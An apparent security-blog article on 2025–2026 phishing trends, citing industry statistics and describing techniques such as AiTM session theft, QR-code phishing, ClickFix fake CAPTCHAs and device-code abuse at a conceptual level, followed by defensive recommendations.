The numbers are worse than most organizations realize. The methods are smarter than most training programs anticipated. And the window between a phish landing and a breach completing has never been shorter.
There’s a version of the phishing conversation that security teams have been having for twenty years. It goes like this: employees receive suspicious emails, they shouldn’t click on links, they should verify before they act.
Train them. Test them. Invest and research for newer tactics. Repeat annually.
That conversation was always insufficient. In 2025 and 2026, it will become operationally dangerous. Phishing has not simply scaled, it has restructured.
The craft of social engineering, once bottlenecked by the time it took to write convincing lures and build credible impersonations, has been largely automated.
What a skilled attacker spent sixteen hours constructing in 2022 now takes roughly five minutes with a capable large language model. The consequence isn’t just more phishing.
It’s better phishing, deployed faster, across more channels, against targets who have been pre-researched by the same AI tools that wrote the message.
The numbers bear this out in ways that should concentrate minds at every level of an organization, not just the SOC.
What the Data Actually Shows
The headline figures from the past 18 months, drawn from APWG, IBM, FBI IC3, and independent security research:
| Over 3.4 billion phishing emails sent daily — roughly 1.2% of all global email traffic | Multiple sources, 2025 |
| APWG logged 4.8 million phishing attacks in 2024 — the highest since the organization was founded in 2003 | APWG 2024 |
| Global phishing sites reached 1,050,031 in 2025, up from 932,923 in 2024 | Zensec / APWG 2025 |
| 82.6% of phishing emails detected (Sep 2024–Feb 2025) showed AI involvement — a 53.5% year-on-year increase | Hoxhunt 2025 |
| Average cost of a phishing-related breach: $4.88 million — up from $4.76 million in 2024 | IBM Cost of a Data Breach 2025 |
| 254 days: average time to identify and contain a breach that began with a phishing email | IBM / Keepnet 2025 |
| BEC attacks alone caused $2.77 billion in reported losses in 2024 across 21,442 FBI complaints | FBI IC3 2024 |
| Adversary-in-the-Middle (AiTM) attacks surged 146% in 2024; Microsoft reported 10,000+ per month targeting its users | Microsoft / APWG 2024 |
| AI-generated phish hit 56% of all phishing email samples in December 2025 — up from 4% the previous month | Hoxhunt Threat Report 2026 |
| Over 90% of all cyberattacks begin with phishing | CISA |
A few of those numbers would strike an eye from a glance. The December 2025 surge in AI-generated phishing, rose from 4% to 56% of sampled attacks in a single month, it is not a trend line.
It is a step change. The security researchers at Hoxhunt attributed it partly to the holiday period, when both attacker activity and human cognitive load peak simultaneously. But the proportion has not retreated to pre-December levels in 2026 reporting.
Equally significant is the 254-day detection window. A phishing email that succeeds on Monday does not typically produce a visible incident by Friday. It produces a foothold.
What happens in the months that follow, lateral movement, privilege escalation, data staging, exfiltration. This is where the real damage accumulates.
The financial cost difference between breaches identified before and after 200 days averages $1.2 million.
The Methods That Defined 2025–2026
The phishing techniques gaining ground right now are not refinements of old approaches. They are structural workarounds for the defenses organizations invested in over the last decade.
Adversary-in-the-Middle (AiTM) Attacks
Multi-factor authentication was supposed to close the credential theft loop. Sadly, AiTM attacks are specifically engineered to reopen it.
The victim authenticates normally, including completing their MFA challenge. The attacker’s infrastructure intercepts the resulting session cookie in real time.
The credential is irrelevant. The session is what matters, and the session is already compromised before the login screen closes.
The 146% surge in AiTM attacks recorded in 2024 reflects on the maturation of available toolkits. It also is amalgamation of the fact that MFA adoption has made traditional credential phishing less useful on its own.
As defenses improve, attack methodology evolves to route around them. That is the consistent pattern in this threat category and it is accelerating.
Quishing: QR Code Phishing
QR code phishing, quishing was an emerging technique. It rapidly crossed over and became a mainstream threat vector in 2024 and has not slowed since.
Abnormal Security tracked a 400% increase in QR code attacks between 2023 and 2025. The mechanism is straightforward and its effectiveness is structural: a QR code embedded in an email is an image, not a URL.
The result is a delivery mechanism that bypasses the primary technical layer most organizations rely on for phishing filtering.
For most industries like energy, healthcare, and manufacturing have been the most affected sectors.
It is a routine for employees to regularly receive QR codes for legitimate operational purposes, which reduces the natural suspicion response. The attacker benefits from both the technical bypass and the contextual plausibility.
ClickFix and Fake CAPTCHA Campaigns
One of the more technically clever developments of 2025 is the ClickFix social engineering pattern, flagged prominently in ENISA’s 2025 threat landscape reporting.
The victim reaches what appears to be a CAPTCHA verification page, the familiar ‘I am not a robot’ interaction that millions of people complete without a second thought.
The page instructs the user to copy a command and paste it into their system’s Run dialogue or terminal. The command, obviously, executes malware.
What makes ClickFix particularly hard to defend against is that it exploits a learned behavior (completing CAPTCHAs) and places the malicious action entirely in the user’s hands.
No download prompt. No suspicious attachment. Just a user who was told to run something and did. Endpoint controls that flag suspicious file execution can catch it, but only if they’re configured and monitored correctly.
Microsoft 365 Device Code Phishing
Proofpoint documented significant growth in a phishing technique that abuses Microsoft’s device code authentication flow. The feature was designed for smart TVs and devices without conventional keyboards.
The attacker initiates a legitimate device code authentication request and sends the resulting code to the target. It is typically framed as a verification step for a collaboration tool or IT ticket.
If the target enters the code, the attacker receives a valid OAuth token. No password captured. No MFA to bypass. Full account access through Microsoft’s own authentication infrastructure.
This technique is particularly concerning because it produces clean audit logs. The token is issued legitimately. The authentication flow completed as designed.
Who Is Being Targeted — And Why the Distribution Matters
Financial services absorb 23.5% of phishing attacks globally, according to APWG’s 2024–2025 reporting. SaaS and webmail platforms account for 19.4%.
Small businesses occupy a particularly uncomfortable position. Employees at organizations with fewer than 100 people experience 350% more phishing and social engineering attempts than employees at large enterprises.
The attack surface is proportionally smaller, but the security resources to defend it are vastly more limited. 35% of micro-businesses reported a phishing incident in the past year.
The average new employee receives their first phishing email within three weeks of joining a company. In many cases, it happens before their employer has completed their security onboarding.
What Actually Works in Defense
The data on training effectiveness is worth taking seriously. Organizations with ongoing, adaptive security awareness programs see phishing click rates drop to as low as 1.5%. The number stands strong compared to industry averages of 3–8% without structured training.
When employees flag suspicious emails to security teams, it rises from roughly 5% to 21% with recent training. Companies that receive twenty times more early warnings have a fundamentally different detection window than one that receives almost none.
But training is not sufficient without technical controls. DNS-layer filtering catches malicious destinations before a session is established. Session token monitoring and conditional access policies address the AiTM problem more directly than password and MFA controls alone.
For organizations assessing their current posture honestly, the most useful starting question is not ‘do we have security awareness training?’ but ‘what would our detection capability look like if every one of our phishing controls failed simultaneously?’
Because in sufficiently sophisticated attacks, AiTM sessions, device code abuse, ClickFix execution, that is essentially the scenario on the table.
The Honest Assessment
Phishing is the most common initial access vector in cyberattacks because it works. It scales and targets the one component of an organization’s security posture that cannot be patched: the people.
That is not a new observation. What is new is the rate at which the methods are evolving relative to the defenses, and the degree to which AI has flattened the skill curve for attackers while raising the stakes for defenders.
The organizations that will fare better in this environment are not necessarily the ones with the largest security budgets.
They are the ones that have been honest about which of their controls are actually working, which are providing false confidence, and which of the new attack methods they are not yet equipped to detect.
Starting from an accurate picture of exposure is the minimum precondition for building a meaningful response to it.
